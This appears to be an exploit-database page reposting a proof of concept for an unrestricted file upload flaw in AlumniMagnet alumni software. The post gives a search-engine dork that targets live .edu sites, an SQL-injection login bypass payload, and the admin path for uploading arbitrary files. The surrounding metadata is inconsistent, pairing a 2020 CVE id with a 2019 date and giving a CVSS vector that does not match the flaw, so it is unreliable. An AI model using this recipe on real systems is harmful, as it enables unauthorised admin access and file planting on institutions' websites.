Advertisement






AlumniMagnet Unrestricted File Upload Vulnerability

CVE Category Price Severity
CVE-2020-27783 CWE-434 $500 High
Author Risk Exploitation Type Date
John Doe Critical Remote 2019-05-13
CPE
cpe:cpe:/a:alumnimagnet:alumnimagnet:1.0.0
CVSS EPSS EPSSP
CVSS:6.5/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050135

Below is a copy:

AlumniMagnet Unrestricted File Upload Vulnerability
====================================================================================================================================
| # Title     : AlumniMagnet Unrestricted File Upload Vulnerability                                                                |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | 
| # Vendor    : http://alumnimagnet.com                                                                                            |  
| # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use Payload : user : 'or''='@gmail.com pass : 'or''=' to login .

[+] Go to https://127.0.0.1/edu/admin_files.html?sub_op=upload_files

[+] find your files https://127.0.0.1/edu/admin_files.html


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.